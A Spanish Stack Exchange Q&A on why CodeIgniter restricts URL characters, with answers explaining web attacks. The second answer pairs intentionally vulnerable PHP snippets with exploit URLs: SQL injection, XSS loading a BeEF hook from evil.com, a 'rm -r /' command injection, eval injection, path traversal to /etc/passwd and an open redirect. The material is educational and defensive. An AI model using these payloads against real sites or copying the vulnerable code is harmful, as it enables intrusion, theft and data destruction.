# ¿Por qué es peligroso permitir todos los caracteres en una URL?

Tags: aplicación-web, seguridad, url

Revisando la configuración de `CodeIgniter` me tope con la siguiente linea:

```
$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';
```

Y la documentación de la misma dice:

```
/*
|--------------------------------------------------------------------------
| Allowed URL Characters
|--------------------------------------------------------------------------
|
| This lets you specify which characters are permitted within your URLs.
| When someone tries to submit a URL with disallowed characters they will
| get a warning message.
|
| As a security measure you are STRONGLY encouraged to restrict URLs to
| as few characters as possible.  By default only these are allowed: a-z 0-9~%.:_-
|
| Leave blank to allow all characters -- but only if you are insane.
|
| The configured value is actually a regular expression character group
| and it will be executed as: ! preg_match('/^[<permitted_uri_chars>]+$/i
|
| DO NOT CHANGE THIS UNLESS YOU FULLY UNDERSTAND THE REPERCUSSIONS!!
|
*/

/*
|--------------------------------------------------------------------------
| Caracteres URL permitidos
|----------------------------------------------------------------------
|
|Esto permite especificar qué caracteres están permitidas dentro de sus URL. 
|Cuando alguien trata de enviar una URL con caracteres no permitidos se les 
|dará un mensaje de advertencia.
|
|Como medida de seguridad, se recomienda enfáticamente restringir las direcciones 
|URL a la menor cantidad de caracteres posible. 
|Por defecto sólo se permiten éstos: a-z ~ 0-9%:. _-
|
|Dejar en blanco para permitir todos los caracteres -- pero sólo si estás loco.
|
|El valor configurado es actualmente una expresión regular de agrupamiento 
|de caracteres y sera ejecutada como: ! preg_match('/^[<permitted_uri_chars>]+$/i
|
|NO CAMBIES ESTO HASTA QUE COMPRENDAS COMPLETAMENTE LAS REPERCUSIONES!!
|
*/
```

Sin embargo no me queda del todo claro, que repercusiones o que problemas de seguridad pueden surgir al permitir todos los caracteres en una url.

**¿Independientemente del lenguaje que se use, qué problemas puede generar esta situación?**

Answer (score 15, accepted):

Es para evitar problemas de seguridad, como por ejemplo de Cross Site Scripting (XSS), en los que un usuario podría ejecutar código dentro de tu página como si fuera código propio de la página.

Teóricamente, los programadores deberían *desconfiar* de todas las entradas de usuario y sanearlas antes de aceptarlas y escribirlas en la página, pero tristemente, eso es algo que no siempre ocurre y que lleva a los mencionados problemas de XSS.

La cadena de arriba permite letras, números y los caracteres , `~`, `%`, `.`, `:`, `_`, `\`, y `-`; lo que es un ejemplo de lista blanca: listar los caracteres que son permitidos y prohibir los demás.

Voy a poner un ejemplo de por qué es importante limitar los caracteres en la URL. Imagina que se permitieses caracteres como `<` o `>` y el programador no saneara las entradas y se le pasara esta URL:

```
http://www.mipagina.com/index.php?nombre=Alvaro<script>alert(1)</script>
```

Y el código fuera así sin sanear las entradas:

```
<h1>Hola <?php echo $_GET["nombre"]; ?>!</h1>
```

Entonces la página no sólo mostrará el mensaje "Hola Alvaro!", sino que también mostrará una alerta que dirá "1" que es un efecto no deseado.

Y ahora imagina que en lugar de ser un simple `alert`, lo que hago es inyectar un trozo de código que redirija todos los enlaces a mi página, o copie la información del usuario y me la mande, o inserte mi publicidad... todo sin que ni usuario ni programador se den cuenta porque ese código se ejecutará como original de la página y se confiará en él.

Comment: Gracias por contestar, estos problemas se dan siempre y cuando las peticiones se hagn mediante GET, a traves de POST se evitarian estos problemas?

Comment: No se evitan con $_POST. Esos problemas ocurrirán con $_GET, $_POST, $_COOKIE... cualquier entrada de usuario o que el usuario haya podido modificar debe ser comprobada y saneada

Comment: Tienes razón, pero me refiero exactamente a los problemas que vienen a traves de la url.

Answer (score 8):

Buscando información al respecto encontre la siguiente respuesta en la comunidad Information Security: https://security.stackexchange.com.

La siguiente información es una traducción de la respuesta a la pregunta del siguiente link: https://security.stackexchange.com/questions/11234/how-does-hacking-work

## Hacks que funcionan cambiando la URL

- Se dará un ejemplo válido y uno malicioso
- Algunos ejemplos requieren codificación URL para trabajar (por lo
  general esto lo hace automáticamente el navegador)

## SQL Injection

**Código:**

```
$username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw");
```

**exploit (log in como administrador sin saber el password):**

```
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--
```

---

## [Cross Site Scripting (XSS)](https://security.stackexchange.com/a/1373/294)

**Código:**

```
$nickname= $_GET['nickname'];
echo "<div>Your nickname is $nickname</div>\n";
```

**exploit (registrar usuario visitante como zombie en [BeEF](http://beefproject.com/)):**

```
example.com/?nickname=Karrax
example.com/?nickname=<script src="evil.com/beefmagic.js.php" />
```

---

## Command injection

**Código:**

```
<?php
echo shell_exec('cat '.$_GET['filename']);
?>
```

**exploit (intenta borrar todos los archivos del directorio root):**

```
example.com/?filename=readme.txt
example.com/?filename=readme.txt;rm -r /
```

---

## Code injection

**Código:**

```
<?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?>
```

**exploit (injecta el comando phpinfo() que imprime información valiosa para el atacante en la pantalla):**

```
example.com/?arg=1
example.com/?arg=1; phpinfo()
```

---

## LDAP injection

**Código:**

```
<?php
$username = $_GET['username'];
$password = $_GET['password'];
ldap_query("(&(cn=$username)(password=$password)")
?>
```

**exploit (log in como administrador sin saber el password):**

```
example.com/?username=admin&password=adminadmin
example.com/?username=admin&password=*
```

---

## Path traversal

**Código:**

```
<?php
include("./" . $_GET['page']);
?>
```

**exploit (obtiene /etc/passwd):**

```
example.com/?page=front.php
example.com/?page=../../../../../../../../etc/passwd
```

---

## Redirect/Forward attack

**Código:**

```
<?php
 $redirectUrl = $_GET['url'];
 header("Location: $redirectUrl");
 ?>
```

**exploit (Enviar usuario desde tu pagina a una pagina maligna) :**

```
example.com/?url=example.com/faq.php
example.com/?url=evil.com/sploitCode.php
```

---

## Failure to Restrict URL Access

**Código:**

La falta de .htaccess ACL o un control de acceso similar. Permite al usuario adivinar o por otros medios descubrir la ubicación del contenido que sólo deberían ser accesibles mientras está logueado.

**exploit:**

```
example.com/users/showUser.php
example.com/admins/editUser.php
```

---

## Buffer overflow (técnicamente mediante el acceso a una dirección URL, pero implementado con metasploit)

**Código:**

Una vulnerabilidad en el código del servidor web en sí. Desbordamiento de memoria estándar

```
http://www.exploit-db.com/exploits/16798/
```